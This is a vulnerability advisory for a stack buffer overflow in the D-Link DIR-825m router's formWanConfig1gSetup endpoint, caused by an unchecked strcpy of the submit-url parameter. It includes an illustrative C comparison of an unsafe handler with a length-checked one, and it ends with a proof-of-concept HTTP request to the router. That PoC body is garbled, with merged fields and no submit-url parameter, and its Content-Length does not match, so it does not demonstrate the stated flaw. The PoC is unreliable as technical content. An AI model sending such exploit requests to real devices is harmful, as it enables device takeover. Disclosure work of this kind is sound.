# D-Link DIR-825m v1.1.12 Buffer Overflow Vulnerability Summary

## Vulnerability Overview

* **Vulnerability Name**: Buffer Overflow in /boafrm/formWanConfig1gSetup
* **Vulnerability Type**: Buffer Overflow
* **Affected Product**: D-Link DIR-825m
* **Affected Version**: Firmware v1.1.12
* **Vulnerability Location**: `/boafrm/formWanConfig1gSetup` endpoint
* **Root Cause**: In the `sub_4148A8` function, the program uses `strcpy` to copy the `submit-url` parameter from the request into a fixed-size stack buffer. Because the length of the value is never checked, an oversized `submit-url` parameter overruns the buffer and overwrites the program stack, resulting in a stack buffer overflow.

## Impact Scope

* **Denial of Service (DoS)**: Crashes the web server process, making the device management interface inaccessible.
* **Remote Code Execution (RCE)**: By overwriting the return address on the stack to redirect the program execution flow, an attacker may gain full control over the device.
* **Network Attacks**: Upon successful exploitation, an attacker can take over the router to monitor network traffic or use it as a pivot to attack other devices within the network.

## Remediation

* **Recommendation**: Upgrade the firmware to the latest version (the vendor has not provided a specific patched version; it is recommended to contact the vendor for updates).
* **Temporary Mitigation**: If possible, restrict access to the management interface or filter the length of the `submit-url` parameter in incoming requests.
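The root cause above (an unbounded `strcpy` of `submit-url` into a stack buffer) and the temporary mitigation (rejecting over-long `submit-url` values before they are copied) are illustrated together in the following C example. It is added here and is not code from the DIR-825m firmware: the buffer size `SUBMIT_URL_BUF`, the `find_param` helper and all function names are assumptions chosen for illustration, and the request bodies are constructed sample input. The unsafe handler mirrors the pattern described for `sub_4148A8`; the safe handler shows the bounded version a fixed firmware or a front-end filter would use.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical stack buffer size, chosen for illustration only; the advisory
   does not state the real size used by sub_4148A8. */
#define SUBMIT_URL_BUF 64

/* Constructed helper: locate a form-urlencoded parameter in a request body.
   Returns a pointer to the start of the value and its length in *len, or NULL
   when the parameter is absent. Matching is anchored at parameter starts so
   that "xsubmit-url=" or "submit-url2=" do not match. */
static const char *find_param(const char *body, const char *name, size_t *len)
{
    size_t nlen = strlen(name);
    const char *p = body;
    while (p != NULL && *p != '\0') {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            const char *end = strchr(v, '&');
            *len = end ? (size_t)(end - v) : strlen(v);
            return v;
        }
        p = strchr(p, '&');
        if (p != NULL)
            p++;
    }
    return NULL;
}

/* Vulnerable pattern as described for sub_4148A8: the value is copied with
   strcpy into a fixed-size stack buffer and nothing checks its length, so a
   value longer than SUBMIT_URL_BUF - 1 bytes overwrites the stack. Shown only
   for contrast; it is never called with untrusted input in this example. */
static void handle_submit_url_unsafe(const char *value)
{
    char dest[SUBMIT_URL_BUF];
    strcpy(dest, value);   /* no bound: this is the overflow */
    (void)dest;
}

/* Hardened version: measure the value first, refuse it if it would not fit,
   and only then copy with an explicit bound and a guaranteed terminator.
   Returns the copied length, -1 if the parameter is absent, -2 if it is too
   long (the request should be rejected, e.g. with HTTP 400). */
static int handle_submit_url_safe(const char *body, char *dest, size_t dest_size)
{
    size_t vlen;
    const char *v = find_param(body, "submit-url", &vlen);
    if (v == NULL)
        return -1;
    if (vlen >= dest_size)
        return -2;             /* would overflow: drop the request */
    memcpy(dest, v, vlen);
    dest[vlen] = '\0';
    return (int)vlen;
}

/* Constructed sample: a normal request body with a short submit-url. */
static int demo_normal_request(void)
{
    char buf[SUBMIT_URL_BUF];
    return handle_submit_url_safe("wanIndex=0&submit-url=/wan.htm&wanType=0",
                                  buf, sizeof buf);
}

/* Constructed sample: a body whose submit-url is far longer than the buffer.
   The safe handler refuses it instead of copying. */
static int demo_oversized_request(void)
{
    char body[256];
    char buf[SUBMIT_URL_BUF];
    memset(body, 'A', sizeof body);
    memcpy(body, "submit-url=", 11);
    body[sizeof body - 1] = '\0';  /* 244 'A' bytes of value */
    return handle_submit_url_safe(body, buf, sizeof buf);
}

int main(void)
{
    handle_submit_url_unsafe("/wan.htm");  /* short value: fits, no overflow */
    printf("normal request: %d\n", demo_normal_request());       /* 8  */
    printf("oversized request: %d\n", demo_oversized_request()); /* -2 */
    return 0;
}
```

The same length check can be applied at a reverse proxy or firewall in front of the management interface when the firmware itself cannot be patched, which is the temporary mitigation the advisory recommends.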
## Proof of Concept (PoC)

```http
POST /boafrm/formWanConfig1gSetup HTTP/1.1
Host: 192.168.0.1
Content-Length: 319
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Origin: http://192.168.0.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate, br
Cookie: webuiCookie=eb0d9vqZbgYfEt2zJd80n
Connection: keep-alive

wanIndex=0&wanName=wanType=0&wanIp=wan_mask=wan_gateway=static1=ip4c110n5=4d51=4d5=24ddcpMTU512e=1500
```